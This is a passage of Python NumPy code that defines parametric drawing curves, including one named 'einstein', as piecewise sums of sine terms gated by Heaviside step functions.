*np.sin(12 *t + 30/29) + 5/12 *np.sin(13 *t + 43/24) + 34/45 *np.sin(14 *t + 15/17) + 13/30 *np.sin(15 *t + 67/23) + 21/31 *np.sin(16 *t + 43/60) + 25/62 *np.sin(17 *t + 89/34) + 9/20 *np.sin(18 *t + 11/26) + 4/17 *np.sin(19 *t + 55/28) + 26/51 *np.sin(20 *t + 4/17) + 2/33 *np.sin(21 *t + 247/62) + 14/31 *np.sin(22 *t + 9/44) + 5/26 *np.sin(23 *t + 113/34) + 9/17 *np.sin(24 *t + 3/10) + 4/25 *np.sin(25 *t + 99/32) + 6/23 *np.sin(27 *t + 548/183) + 10/33 *np.sin(29 *t + 129/37) + 5/12 *np.sin(31 *t + 127/39) - 9719/87) *np.heaviside(59 *np.pi - t,0.5) *np.heaviside(t - 55 *np.pi,0.5) + (228/65 *np.sin(t + 116/33) + 353/40 *np.sin(2 *t + 33/19) + 107/24 *np.sin(3 *t + 58/33) + 58/21 *np.sin(4 *t + 519/130) + 19/15 *np.sin(5 *t + 45/37) + 13/12 *np.sin(6 *t + 145/38) + 43/42 *np.sin(7 *t + 25/99) + 11/19 *np.sin(8 *t + 105/44) + 203/19) *np.heaviside(55 *np.pi - t,0.5) *np.heaviside(t - 51 *np.pi,0.5) + (-23/10 *np.sin(22/17 - 4 *t) - 159/17 *np.sin(156/125 - 3 *t) + 523/112 *np.sin(t + 80/21) + 111/23 *np.sin(2 *t + 25/24) + 92/79 *np.sin(5 *t + 57/32) + 58/37 *np.sin(6 *t + 159/35) + 18/31 *np.sin(7 *t + 27/43) - 7563/28) *np.heaviside(51 *np.pi - t,0.5) *np.heaviside(t - 47 *np.pi,0.5) + (-76/17 *np.sin(42/41 - 14 *t) - 154/31 *np.sin(37/38 - 11 *t) + 10820/41 *np.sin(t + 25/34) + 1476/31 *np.sin(2 *t + 36/19) + 595/12 *np.sin(3 *t + 67/43) + 3568/67 *np.sin(4 *t + 282/77) + 974/59 *np.sin(5 *t + 40/19) + 427/18 *np.sin(6 *t + 47/25) + 454/23 *np.sin(7 *t + 20/27) + 41/40 *np.sin(8 *t + 9/2) + 139/22 *np.sin(9 *t + 99/26) + 276/37 *np.sin(10 *t + 37/29) + 113/25 *np.sin(12 *t + 61/30) + 37/29 
*np.sin(13 *t + 37/31) + 51/19 *np.sin(15 *t + 127/34) + 115/72 *np.sin(16 *t + 7/38) + 162/43 *np.sin(17 *t + 67/21) + 26/33 *np.sin(18 *t + 194/45) - 3614/99) *np.heaviside(47 *np.pi - t,0.5) *np.heaviside(t - 43 *np.pi,0.5) + (347/17 *np.sin(t + 3/13) + 9951/41) *np.heaviside(43 *np.pi - t,0.5) *np.heaviside(t - 39 *np.pi,0.5) + (760/29 *np.sin(t + 23/25) - 6059/28) *np.heaviside(39 *np.pi - t,0.5) *np.heaviside(t - 35 *np.pi,0.5) + (-106/41 *np.sin(7/13 - 18 *t) - 55/38 *np.sin(13/29 - 16 *t) - 173/19 *np.sin(34/29 - 7 *t) - 484/31 *np.sin(13/16 - 5 *t) - 1193/17 *np.sin(97/83 - 2 *t) + 6885/26 *np.sin(t + 41/48) + 99/5 *np.sin(3 *t + 5/16) + 751/36 *np.sin(4 *t + 73/18) + 129/40 *np.sin(6 *t + 83/18) + 327/31 *np.sin(8 *t + 17/23) + 498/47 *np.sin(9 *t + 123/88) + 298/49 *np.sin(10 *t + 54/25) + 82/15 *np.sin(11 *t + 153/35) + 106/27 *np.sin(12 *t + 3/32) + 171/43 *np.sin(13 *t + 433/173) + 36/11 *np.sin(14 *t + 98/33) + 39/22 *np.sin(15 *t + 97/25) + 68/37 *np.sin(17 *t + 157/34) - 227/29) *np.heaviside(35 *np.pi - t,0.5) *np.heaviside(t - 31 *np.pi,0.5) + (-2/15 *np.sin(66/47 - 14 *t) - 45/23 *np.sin(5/9 - 11 *t) - 151/43 *np.sin(13/32 - 8 *t) - 31/36 *np.sin(24/19 - 7 *t) + 2121/32 *np.sin(t + 45/38) + 2085/47 *np.sin(2 *t + 299/88) + 1321/43 *np.sin(3 *t + 72/25) + 557/37 *np.sin(4 *t + 74/21) + 205/17 *np.sin(5 *t + 27/23) + 13/9 *np.sin(6 *t + 113/32) + 35/17 *np.sin(9 *t + 7/22) + 93/26 *np.sin(10 *t + 112/25) + 11/14 *np.sin(12 *t + 58/17) + 8/15 *np.sin(13 *t + 47/30) + 33/20 *np.sin(15 *t + 32/25) + 31/94 *np.sin(16 *t + 192/59) + 35/31 *np.sin(17 *t + 51/77) + 9473/34) *np.heaviside(31 *np.pi - t,0.5) *np.heaviside(t - 27 *np.pi,0.5) + (-33/29 *np.sin(27/55 - 12 *t) + 388/13 *np.sin(t + 5/13) + 2087/30 *np.sin(2 *t + 193/55) + 1311/49 *np.sin(3 *t + 133/30) + 993/41 *np.sin(4 *t + 134/31) + 175/17 *np.sin(5 *t + 73/29) + 83/23 *np.sin(6 *t + 28/33) + 9/19 *np.sin(7 *t + 73/36) + 101/32 *np.sin(8 *t + 57/28) + 51/25 *np.sin(9 *t + 106/39) + 47/28 *np.sin(10 *t + 129/47) + 17/29 *np.sin(11 *t + 33/17) + 27/22 *np.sin(13 *t + 155/86) + 108/65 *np.sin(14 *t + 8/27) + 9/16 *np.sin(15 *t + 44/13) + 11/14 *np.sin(16 *t + 3/19) + 11/23 *np.sin(17 *t + 106/23) + 9/64 *np.sin(18 *t + 97/22) - 10004/35) *np.heaviside(27 *np.pi - t,0.5) *np.heaviside(t - 23 *np.pi,0.5) + (-18/13 *np.sin(7/50 - 18 *t) - 7/5 *np.sin(1/10 - 16 *t) - 51/25 *np.sin(18/19 - 12 *t) - 219/35 *np.sin(7/30 - 10 *t) - 158/43 *np.sin(40/37 - 6 *t) - 512/25 *np.sin(13/16 - 4 *t) - 289/29 *np.sin(68/67 - 2 *t) + 18315/101 *np.sin(t + 29/18) + 664/31 *np.sin(3 *t + 61/23) + 48/11 *np.sin(5 *t + 84/67) + 489/49 *np.sin(7 *t + 11/25) + 397/33 *np.sin(8 *t + 8/19) + 73/12 *np.sin(9 *t + 9/53) + 194/41 *np.sin(11 *t + 17/14) + 2/3 *np.sin(13 *t + 149/50) + 43/29 *np.sin(14 *t + 91/31) + 61/35 *np.sin(15 *t + 131/56) + 29/37 *np.sin(17 *t + 1/19) + 49/43 *np.sin(19 *t + 65/24) + 15/19 *np.sin(20 *t + 88/21) + 11/38 *np.sin(21 *t + 217/50) + 3917/10) *np.heaviside(23 *np.pi - t,0.5) *np.heaviside(t - 19 *np.pi,0.5) + (-8/9 *np.sin(12/23 - 16 *t) - 504/53 *np.sin(8/29 - 8 *t) - 635/43 *np.sin(32/37 - 4 *t) - 307/41 *np.sin(8/27 - 3 *t) - 20292/91 *np.sin(16/19 - t) + 483/19 *np.sin(2 *t + 41/13) + 108/23 *np.sin(5 *t + 70/29) + 74/35 *np.sin(6 *t + 145/34) + 287/43 *np.sin(7 *t + 69/16) + 254/39 *np.sin(9 *t + 5/27) + 19/4 *np.sin(10 *t + 37/30) + 129/46 *np.sin(11 *t + 75/32) + 24/19 *np.sin(12 *t + 71/46) + 125/52 *np.sin(13 *t + 87/44) + 46/27 *np.sin(14 *t + 40/31) + 26/29 *np.sin(15 *t + 106/27) + 25/63 *np.sin(17 *t + 
53/12) + 23/22 *np.sin(18 *t + 9/29) + 3/35 *np.sin(19 *t + 205/103) + 200/201 *np.sin(20 *t + 22/25) + 8/31 *np.sin(21 *t + 77/25) - 15195/29) *np.heaviside(19 *np.pi - t,0.5) *np.heaviside(t - 15 *np.pi,0.5) + (-15/23 *np.sin(22/23 - 35 *t) - 21/26 *np.sin(13/40 - 30 *t) - 71/64 *np.sin(16/19 - 29 *t) - 97/29 *np.sin(15/41 - 23 *t) - 57/17 *np.sin(54/35 - 16 *t) - 79/25 *np.sin(41/39 - 14 *t) - 24/11 *np.sin(3/8 - 13 *t) - 149/17 *np.sin(21/62 - 6 *t) - 613/31 *np.sin(16/17 - 2 *t) + 6033/20 *np.sin(t + 24/17) + 631/16 *np.sin(3 *t + 127/30) + 463/31 *np.sin(4 *t + 71/28) + 94/23 *np.sin(5 *t + 98/25) + 45/11 *np.sin(7 *t + 31/10) + 39/23 *np.sin(8 *t + 163/39) + 23/22 *np.sin(9 *t + 42/17) + 167/44 *np.sin(10 *t + 232/231) + 233/49 *np.sin(11 *t + 29/45) + 194/129 *np.sin(12 *t + 3/5) + 166/37 *np.sin(15 *t + 83/29) + 123/35 *np.sin(17 *t + 136/35) + 47/26 *np.sin(18 *t + 64/25) + 72/35 *np.sin(19 *t + 41/14) + 56/31 *np.sin(20 *t + 48/35) + 63/25 *np.sin(21 *t + 2/5) + 100/37 *np.sin(22 *t + 13/15) + 4/3 *np.sin(24 *t + 59/19) + 17/25 *np.sin(25 *t + 15/38) + 51/19 *np.sin(26 *t + 68/19) + 11/27 *np.sin(27 *t + 228/91) + 19/14 *np.sin(28 *t + 31/9) + 4/13 *np.sin(31 *t + 14/55) + 31/37 *np.sin(32 *t + 2/31) + 150/151 *np.sin(33 *t + 58/21) + 41/32 *np.sin(34 *t + 26/11) + 4/3 *np.sin(36 *t + 25/18) - 6956/53) *np.heaviside(15 *np.pi - t,0.5) *np.heaviside(t - 11 *np.pi,0.5) + (4337/36 *np.sin(t + 45/29) + 265/18) *np.heaviside(11 *np.pi - t,0.5) *np.heaviside(t - 7 *np.pi,0.5) + (-23/21 *np.sin(31/61 - t) - 1152/11) *np.heaviside(7 *np.pi - t,0.5) *np.heaviside(t - 3 *np.pi,0.5) + (3314/27 *np.sin(t + 30/31) + 65/31 *np.sin(2 *t + 26/23) - 1467/5) *np.heaviside(3 *np.pi - t,0.5) *np.heaviside(t + np.pi,0.5)) *np.heaviside(np.sin(t/2),0.0)
Y = ((-9/23 *np.sin(38/25 - 6 *t) - 67/38 *np.sin(36/23 - 3 *t) + 31/30 *np.sin(t + 14/9) + 409/9 *np.sin(2 *t + 74/47) + 493/141 *np.sin(4 *t + 85/54) + 14/17 *np.sin(5 *t + 75/16) + 5/46 *np.sin(7 *t + 21/13) + 33/23 *np.sin(8 *t + 74/47) + 14536/41) *np.heaviside(71 *np.pi - t,0.5) *np.heaviside(t - 67 *np.pi,0.5) + (-89/29 *np.sin(59/38 - 17 *t) - 5/11 *np.sin(14/9 - 16 *t) - 99/40 *np.sin(58/37 - 15 *t) - 59/7 *np.sin(25/16 - 11 *t) - 2/35 *np.sin(8/41 - 10 *t) - 381/26 *np.sin(25/16 - 9 *t) - 67/21 *np.sin(17/11 - 8 *t) - 1706/37 *np.sin(36/23 - 5 *t) - 29/9 *np.sin(29/19 - 4 *t) - 851/29 *np.sin(58/37 - 3 *t) + 1991/30 *np.sin(t + 96/61) + 528/17 *np.sin(2 *t + 85/54) + 89/67 *np.sin(6 *t + 37/24) + 102/13 *np.sin(7 *t + 80/17) + 17/16 *np.sin(12 *t + 91/58) + 35/12 *np.sin(13 *t + 37/23) + 127/27 *np.sin(14 *t + 27/17) - 26576/29) *np.heaviside(67 *np.pi - t,0.5) *np.heaviside(t - 63 *np.pi,0.5) + (-29/14 *np.sin(47/33 - 16 *t) - 35/22 *np.sin(75/52 - 15 *t) - 236/63 *np.sin(16/11 - 14 *t) - 41/6 *np.sin(34/23 - 13 *t) - 236/29 *np.sin(46/31 - 12 *t) - 167/28 *np.sin(55/37 - 11 *t) - 259/33 *np.sin(76/51 - 10 *t) - 414/73 *np.sin(56/37 - 9 *t) - 121/28 *np.sin(17/11 - 7 *t) - 177/32 *np.sin(61/41 - 6 *t) - 1499/41 *np.sin(48/31 - 5 *t) - 647/23 *np.sin(25/16 - 3 *t) + 610/13 *np.sin(t + 30/19) + 1474/31 *np.sin(2 *t + 30/19) + 807/41 *np.sin(4 *t + 41/26) + 208/31 *np.sin(8 *t + 43/27) - 16147/17) *np.heaviside(63 *np.pi - t,0.5) *np.heaviside(t - 59 *np.pi,0.5) + (-12/41 *np.sin(1/4 - 28 *t) - 11/43 *np.sin(9/14 - 26 *t) - 17/41 *np.sin(14/13 - 24 *t) - 22/31 *np.sin(17/67 - 22 *t) - 7/10 *np.sin(64/63 - 19 *t) - 69/41 *np.sin(39/31 - 14 *t) - 86/25 *np.sin(22/41 - 12 *t) - 87/52 *np.sin(31/27 - 9 *t) - 23/15 *np.sin(13/33 - 7 *t) - 25/17 *np.sin(22/25 - 3 *t) + 159/28 *np.sin(t + 249/248) + 571/20 *np.sin(2 *t + 23/26) + 109/36 *np.sin(4 *t + 29/18) + 161/58 *np.sin(5 *t + 31/23) + 147/26 *np.sin(6 *t + 31/19) + 199/35 *np.sin(8 *t + 37/42) + 96/19 *np.sin(10 *t + 17/47) + 64/27 *np.sin(11 *t + 337/75) + 15/7 *np.sin(13 *t + 157/44) + np.sin(15 *t + 101/33) + 5/38 *np.sin(16 *t + 1/28) + 11/56 *np.sin(17 *t + 23/37) + 6/11 *np.sin(18 *t + 8/9) + 91/136 *np.sin(20 *t + 3/19) + 55/54 *np.sin(21 *t + 102/25) + 15/16 *np.sin(23 *t + 118/31) + 22/27 *np.sin(25 *t + 49/15) + 3/8 *np.sin(27 *t + 27/8) + 22/43 *np.sin(29 *t + 57/16) + 10/19 *np.sin(30 *t + 50/83) + 5/31 *np.sin(31 *t + 121/38) + 2727/23) *np.heaviside(59 *np.pi - t,0.5) *np.heaviside(t - 55 *np.pi,0.5) + (-41/31 *np.sin(23/21 - 4 *t) - 85/14 *np.sin(17/32 - t) + 407/35 *np.sin(2 *t + 75/22) + 21/10 *np.sin(3 *t + 41/14) + 53/54 *np.sin(5 *t + 54/25) + 31/61 *np.sin(6 *t + 124/27) + 5/36 *np.sin(7 *t + 3/19) + 19/31 *np.sin(8 *t + 144/31) + 10393/23) *np.heaviside(55 *np.pi - t,0.5) *np.heaviside(t - 51 *np.pi,0.5) + (-36/41 *np.sin(5/18 - 6 *t) + 83/35 *np.sin(t + 95/28) + 43/37 *np.sin(2 *t + 66/17) + 165/13 *np.sin(3 *t + 27/53) + 79/19 *np.sin(4 *t + 9/17) + 37/24 *np.sin(5 *t + 190/63) + 57/58 *np.sin(7 *t + 267/100) + 13545/31) *np.heaviside(51 *np.pi - t,0.5) *np.heaviside(t - 47 *np.pi,0.5) + (-123/47 *np.sin(19/15 - 18 *t) - 59/29 *np.sin(1/49 - 16 *t) - 213/37 *np.sin(29/22 - 13 *t) - 381/40 *np.sin(4/29 - 11 *t) - 168/29 *np.sin(6/11 - 10 *t) - 1233/44 *np.sin(3/19 - 3 *t) - 711/7 *np.sin(1/39 - 2 *t) - 5171/26 *np.sin(12/19 - t) + 2965/57 *np.sin(4 *t + 89/28) + 347/21 *np.sin(5 *t + 23/93) + 1087/69 *np.sin(6 *t + 4/31) + 760/37 *np.sin(7 *t + 172/53) + 333/19 *np.sin(8 *t + 7/13) + 325/81 *np.sin(9 *t + 
96/55) + 53/17 *np.sin(12 *t + 138/49) + 73/40 *np.sin(14 *t + 92/67) + 47/31 *np.sin(15 *t + 81/19) + 7/11 *np.sin(17 *t + 29/30) - 3017/19) *np.heaviside(47 *np.pi - t,0.5) *np.heaviside(t - 43 *np.pi,0.5) + (-713/27 *np.sin(22/17 - t) - 36840/41) *np.heaviside(43 *np.pi - t,0.5) *np.heaviside(t - 39 *np.pi,0.5) + (-675/23 *np.sin(13/16 - t) - 17750/19) *np.heaviside(39 *np.pi - t,0.5) *np.heaviside(t - 35 *np.pi,0.5) + (-39/29 *np.sin(11/16 - 17 *t) - 102/37 *np.sin(8/49 - 11 *t) - 95/34 *np.sin(4/13 - 9 *t) - 71/22 *np.sin(7/12 - 8 *t) - 194/17 *np.sin(29/23 - 7 *t) - 2531/25 *np.sin(13/36 - t) + 601/19 *np.sin(2 *t + 264/61) + 232/5 *np.sin(3 *t + 53/13) + 309/40 *np.sin(4 *t + 29/10) + 266/39 *np.sin(5 *t + 3/16) + 71/95 *np.sin(6 *t + 50/37) + 281/44 *np.sin(10 *t + 33/43) + 29/15 *np.sin(12 *t + 105/29) + 39/25 *np.sin(13 *t + 109/36) + 24/11 *np.sin(14 *t + 51/38) + 19/9 *np.sin(15 *t + 38/23) + 43/29 *np.sin(16 *t + 4) + 53/74 *np.sin(18 *t + 74/25) - 45956/91) *np.heaviside(35 *np.pi - t,0.5) *np.heaviside(t - 31 *np.pi,0.5) + (-25/32 *np.sin(4/13 - 15 *t) - 40/43 *np.sin(11/19 - 13 *t) - 12727/115 *np.sin(83/84 - t) + 1762/31 *np.sin(2 *t + 66/29) + 905/78 *np.sin(3 *t + 46/25) + 209/25 *np.sin(4 *t + 104/37) + 103/27 *np.sin(5 *t + 32/17) + 121/60 *np.sin(6 *t + 143/37) + 29/7 *np.sin(7 *t + 45/13) + 41/36 *np.sin(8 *t + 271/58) + 125/62 *np.sin(9 *t + 152/33) + 118/79 *np.sin(10 *t + 56/25) + 41/24 *np.sin(11 *t + 108/25) + 22/45 *np.sin(12 *t + 116/41) + 43/35 *np.sin(14 *t + 68/19) + 1/15 *np.sin(16 *t + 26/11) + 13/43 *np.sin(17 *t + 53/25) - 29541/41) *np.heaviside(31 *np.pi - t,0.5) *np.heaviside(t - 27 *np.pi,0.5) + (-235/21 *np.sin(5/46 - 5 *t) - 133/13 *np.sin(3/29 - 4 *t) - 437/37 *np.sin(50/37 - 3 *t) - 2785/19 *np.sin(5/4 - t) + 724/17 *np.sin(2 *t + 68/29) + 211/141 *np.sin(6 *t + 83/44) + 41/14 *np.sin(7 *t + 135/32) + 83/20 *np.sin(8 *t + 135/38) + 123/62 *np.sin(9 *t + 136/33) + 304/203 *np.sin(10 *t + 166/47) + 59/44 *np.sin(11 *t + 5/29) + 25/36 *np.sin(12 *t + 102/49) + 13/12 *np.sin(13 *t + 101/41) + 23/13 *np.sin(14 *t + 73/26) + 5/32 *np.sin(15 *t + 85/27) + 41/61 *np.sin(16 *t + 56/25) + 1/7 *np.sin(17 *t + 10/17) + 7/18 *np.sin(18 *t + 134/51) - 8059/11) *np.heaviside(27 *np.pi - t,0.5) *np.heaviside(t - 23 *np.pi,0.5) + (-32/23 *np.sin(20/27 - 18 *t) - 31/20 *np.sin(19/17 - 17 *t) - 89/38 *np.sin(30/23 - 13 *t) - 529/122 *np.sin(22/15 - 10 *t) - 151/35 *np.sin(2/27 - 8 *t) - 417/28 *np.sin(43/29 - 4 *t) - 851/35 *np.sin(3/14 - 3 *t) - 13229/88 *np.sin(31/52 - t) + 425/12 *np.sin(2 *t + 37/18) + 397/30 *np.sin(5 *t + 37/17) + 299/31 *np.sin(6 *t + 122/41) + 301/38 *np.sin(7 *t + 58/35) + 240/43 *np.sin(9 *t + 118/27) + 39/28 *np.sin(11 *t + 27/34) + 82/165 *np.sin(12 *t + 58/27) + 29/26 *np.sin(14 *t + 77/27) + 47/19 *np.sin(15 *t + 7/4) + 46/17 *np.sin(16 *t + 79/22) + 46/35 *np.sin(19 *t + 43/21) + 23/28 *np.sin(20 *t + 105/31) + 27/23 *np.sin(21 *t + 184/41) - 12036/55) *np.heaviside(23 *np.pi - t,0.5) *np.heaviside(t - 19 *np.pi,0.5) + (-16/37 *np.sin(42/43 - 19 *t) - 21/23 *np.sin(37/26 - 18 *t) - 23/17 *np.sin(25/56 - 17 *t) - 46/61 *np.sin(34/45 - 16 *t) - 161/22 *np.sin(1/2 - 6 *t) - 472/43 *np.sin(15/23 - 5 *t) - 620/29 *np.sin(43/60 - 3 *t) + 2821/25 *np.sin(t + 167/39) + 2605/88 *np.sin(2 *t + 89/30) + 449/43 *np.sin(4 *t + 66/25) + 37/24 *np.sin(7 *t + 37/33) + 107/13 *np.sin(8 *t + 175/52) + 341/128 *np.sin(9 *t + 188/41) + 32/15 *np.sin(10 *t + 12/19) + 208/43 *np.sin(11 *t + 44/73) + 122/53 *np.sin(12 *t + 41/39) + 69/40 *np.sin(13 *t + 
9/32) + 34/23 *np.sin(14 *t + 208/45) + 19/11 *np.sin(15 *t + 11/36) + 17/19 *np.sin(20 *t + 111/26) + 4/15 *np.sin(21 *t + 26/25) - 10055/37) *np.heaviside(19 *np.pi - t,0.5) *np.heaviside(t - 15 *np.pi,0.5) + (-59/44 *np.sin(173/172 - 36 *t) - 73/31 *np.sin(21/53 - 30 *t) - 23/11 *np.sin(13/12 - 29 *t) - 133/50 *np.sin(23/19 - 28 *t) - 125/29 *np.sin(108/77 - 24 *t) - 122/33 *np.sin(1/19 - 21 *t) - 238/79 *np.sin(4/7 - 16 *t) - 141/16 *np.sin(34/37 - 9 *t) - 45/8 *np.sin(16/27 - 7 *t) + 11594/23 *np.sin(t + 1768/589) + 1582/37 *np.sin(2 *t + 28/25) + 771/38 *np.sin(3 *t + 107/31) + 863/22 *np.sin(4 *t + 87/22) + 485/29 *np.sin(5 *t + 63/25) + 27/8 *np.sin(6 *t + 75/76) + 106/19 *np.sin(8 *t + 20/23) + 54/17 *np.sin(10 *t + 10/49) + 206/61 *np.sin(11 *t + 106/29) + 65/14 *np.sin(12 *t + 81/29) + 80/11 *np.sin(13 *t + 49/43) + 41/29 *np.sin(14 *t + 1/114) + 17/38 *np.sin(15 *t + 97/43) + 97/20 *np.sin(17 *t + 98/23) + 77/30 *np.sin(18 *t + 49/19) + 44/13 *np.sin(19 *t + 53/16) + 44/19 *np.sin(20 *t + 95/23) + 135/29 *np.sin(22 *t + 27/25) + 243/121 *np.sin(23 *t + 23/17) + 15/4 *np.sin(25 *t + 10/17) + 50/13 *np.sin(26 *t + 75/32) + 308/47 *np.sin(27 *t + 253/76) + 65/19 *np.sin(31 *t + 7/15) + 92/33 *np.sin(32 *t + 26/11) + 17/15 *np.sin(33 *t + 74/23) + 8/15 *np.sin(34 *t + 64/27) + 17/27 *np.sin(35 *t + 215/72) + 16757/30) *np.heaviside(15 *np.pi - t,0.5) *np.heaviside(t - 11 *np.pi,0.5) + (1805/16 *np.sin(t + 1/303) + 19936/43) *np.heaviside(11 *np.pi - t,0.5) *np.heaviside(t - 7 *np.pi,0.5) + (374/65 *np.sin(t + 149/47) + 11537/27) *np.heaviside(7 *np.pi - t,0.5) *np.heaviside(t - 3 *np.pi,0.5) + (-15391/135 *np.sin(35/71 - t) + 112/53 *np.sin(2 *t + 66/29) + 13507/30) *np.heaviside(3 *np.pi - t,0.5) *np.heaviside(t + np.pi,0.5)) *np.heaviside(np.sin(t/2),0.0)
elif curvename=='einstein':
X = ((-38/9 *np.sin(11/7 - 3 *t) + 156/5 *np.sin(t + 47/10) + 91/16 *np.sin(2 *t + 21/13) + 555/2) *theta(91 *np.pi - t) *theta(t - 87 *np.pi) + (-12/11 *np.sin(35/23 - 11 *t) + 4243/12 *np.sin(t + 11/7) + 678/11 *np.sin(2 *t + 33/7) + 401/6 *np.sin(3 *t + 47/10) + 59/3 *np.sin(4 *t + 11/7) + 238/25 *np.sin(5 *t + 47/10) + 85/11 *np.sin(6 *t + 51/11) + 57/4 *np.sin(7 *t + 61/13) + 28/29 *np.sin(8 *t + 22/5) + 52/9 *np.sin(9 *t + 14/3) + 286/57 *np.sin(10 *t + 11/7) + 19/11 *np.sin(12 *t + 32/7) + 30/11 *np.sin(13 *t + 60/13) + 95/14 *np.sin(14 *t + 89/19) + 32/7 *np.sin(15 *t + 11/7) + 43/10 *np.sin(16 *t + 65/14) + 19/7 *np.sin(17 *t + 32/7) + 13/10 *np.sin(18 *t + 77/17) + 11/9 *np.sin(19 *t + 85/19) + 1/5 *np.sin(20 *t + 4) + 3/11 *np.sin(21 *t + 28/9) + 29/11 *np.sin(22 *t + 60/13) + 80/27 *np.sin(23 *t + 50/11) + 19/12 *np.sin(24 *t + 60/13) + 1/5 *np.sin(25 *t + 12/5) + 82/13 *np.sin(26 *t + 51/11) + 3/11 *np.sin(27 *t + 19/8) + 32/9 *np.sin(28 *t + 10/7) + 41/7 *np.sin(29 *t + 22/15) + 9/11 *np.sin(30 *t + 11/8) + 2881/6) *theta(87 *np.pi - t) *theta(t - 83 *np.pi) + (-46/31 *np.sin(20/13 - 22 *t) - 22/9 *np.sin(14/9 - 6 *t) - 5/4 *np.sin(3/2 - 4 *t) + 399/5 *np.sin(t + 11/7) + 16/9 *np.sin(2 *t + 3/2) + 116/13 *np.sin(3 *t + 14/9) + 8/5 *np.sin(5 *t + 14/9) + 11/7 *np.sin(7 *t + 8/5) + 9/11 *np.sin(8 *t + 14/3) + 28/13 *np.sin(9 *t + 11/7) + 7/8 *np.sin(10 *t + 11/7) + 23/12 *np.sin(11 *t + 17/11) + 11/12 *np.sin(12 *t + 19/13) + 35/23 *np.sin(13 *t + 3/2) + 13/7 *np.sin(14 *t + 20/13) + 19/9 *np.sin(15 *t + 3/2) + 11/5 *np.sin(16 *t + 3/2) + 27/13 *np.sin(17 *t + 34/23) + 3 *np.sin(18 *t + 26/17) + 6/5 *np.sin(19 *t + 7/5) + 19/12 *np.sin(20 *t + 29/19) + 20/13 *np.sin(21 *t + 21/13) + 8/9 *np.sin(23 *t + 32/7) + 22/23 *np.sin(24 *t + 23/5) + 17/11 *np.sin(25 *t + 61/13) + 13021/30) *theta(83 *np.pi - t) *theta(t - 79 *np.pi) + (-15/31 *np.sin(11/7 - 8 *t) + 1/15 *np.sin(t + 11/6) + 55/14 *np.sin(2 *t + 19/12) + 88/13 *np.sin(3 *t + 19/12) + 17/9 *np.sin(4 *t + 8/5) + 1/18 *np.sin(5 *t + 16/9) + 4/7 *np.sin(6 *t + 21/13) + 9/8 *np.sin(7 *t + 8/5) + 8/15 *np.sin(9 *t + 8/5) + 3053/7) *theta(79 *np.pi - t) *theta(t - 75 *np.pi) + (-20/3 *np.sin(11/7 - 4 *t) - 117/8 *np.sin(11/7 - 3 *t) - 647/27 *np.sin(11/7 - 2 *t) + 559/15 *np.sin(t + 11/7) + 2/13 *np.sin(5 *t + 13/8) + 6/17 *np.sin(6 *t + 18/11) + 5/8 *np.sin(7 *t + 8/5) + 22549/41) *theta(75 *np.pi - t) *theta(t - 71 *np.pi) + (-11/9 *np.sin(17/11 - 10 *t) - 40/13 *np.sin(14/9 - 8 *t) - 254/23 *np.sin(11/7 - 4 *t) - 62/7 *np.sin(11/7 - 2 *t) + 11 *np.sin(t + 11/7) + 255/16 *np.sin(3 *t + 11/7) + 137/10 *np.sin(5 *t + 19/12) + 111/8 *np.sin(6 *t + 19/12) + 29/19 *np.sin(7 *t + 8/5) + 2/9 *np.sin(9 *t + 26/17) + 11/12 *np.sin(11 *t + 19/12) + 1/24 *np.sin(12 *t + 41/9) + 8/9 *np.sin(14 *t + 13/8) + 1313/3) *theta(71 *np.pi - t) *theta(t - 67 *np.pi) + (-5/8 *np.sin(14/9 - 8 *t) - 11/13 *np.sin(14/9 - 7 *t) - 12/5 *np.sin(11/7 - 6 *t) - 7/9 *np.sin(14/9 - 3 *t) - 272/13 *np.sin(11/7 - 2 *t) + 7/2 *np.sin(t + 11/7) + 3/4 *np.sin(4 *t + 14/9) + 7/9 *np.sin(5 *t + 11/7) + 3/13 *np.sin(9 *t + 11/7) + 4876/9) *theta(67 *np.pi - t) *theta(t - 63 *np.pi) + (-22/9 *np.sin(11/7 - t) + 177/7 *np.sin(2 *t + 11/7) + 21/10 *np.sin(3 *t + 11/7) + 11/7 *np.sin(4 *t + 11/7) + 1/14 *np.sin(5 *t + 17/10) + 66/19 *np.sin(6 *t + 11/7) + 1/22 *np.sin(7 *t + 12/7) + 20/13 *np.sin(8 *t + 11/7) + 3561/10) *theta(63 *np.pi - t) *theta(t - 59 *np.pi) + (-9/17 *np.sin(25/17 - 11 *t) - 1/2 *np.sin(25/17 - 10 *t) - 1/5 *np.sin(9/7 - 9 *t) - 1/3 *np.sin(4/3 - 8 
*t) - 7/3 *np.sin(14/9 - 7 *t) - 208/25 *np.sin(14/9 - 4 *t) + 139/3 *np.sin(t + 11/7) + 186/5 *np.sin(2 *t + 11/7) + 19/6 *np.sin(3 *t + 8/5) + 19/12 *np.sin(5 *t + 8/5) + 3/13 *np.sin(6 *t + 7/4) + 2/5 *np.sin(12 *t + 13/8) + 1/9 *np.sin(13 *t + 65/14) + 6/13 *np.sin(14 *t + 18/11) + 1/8 *np.sin(15 *t + 5/3) + 1/8 *np.sin(16 *t + 7/4) + 1/18 *np.sin(17 *t + 24/11) + 1737/4) *theta(59 *np.pi - t) *theta(t - 55 *np.pi) + (-6/13 *np.sin(23/15 - 21 *t) - 3/10 *np.sin(10/7 - 20 *t) - 7/8 *np.sin(26/17 - 19 *t) - 1/4 *np.sin(19/13 - 18 *t) - 11/17 *np.sin(17/11 - 17 *t) - 1/8 *np.sin(11/9 - 16 *t) - 7/8 *np.sin(17/11 - 15 *t) - 38/39 *np.sin(11/7 - 13 *t) - 57/10 *np.sin(14/9 - 7 *t) - 1/7 *np.sin(3/5 - 6 *t) - 201/10 *np.sin(14/9 - 5 *t) - 28/11 *np.sin(17/11 - 4 *t) - 303/10 *np.sin(14/9 - 3 *t) + 1084/9 *np.sin(t + 11/7) + 39/7 *np.sin(2 *t + 14/9) + 23/14 *np.sin(8 *t + 14/9) + 22/23 *np.sin(9 *t + 47/10) + 8/13 *np.sin(10 *t + 11/7) + 1/8 *np.sin(11 *t + 22/13) + 10/19 *np.sin(12 *t + 11/7) + 9/13 *np.sin(14 *t + 21/13) + 1/8 *np.sin(22 *t + 11/7) + 1319/3) *theta(55 *np.pi - t) *theta(t - 51 *np.pi) + (-3/2 *np.sin(11/7 - 17 *t) - 9/8 *np.sin(14/9 - 15 *t) - 12/7 *np.sin(14/9 - 14 *t) - 8/7 *np.sin(14/9 - 12 *t) - 6/19 *np.sin(3/2 - 11 *t) - 296/11 *np.sin(11/7 - 5 *t) - 163/25 *np.sin(11/7 - 4 *t) - 721/20 *np.sin(11/7 - 3 *t) - 85/4 *np.sin(11/7 - 2 *t) + 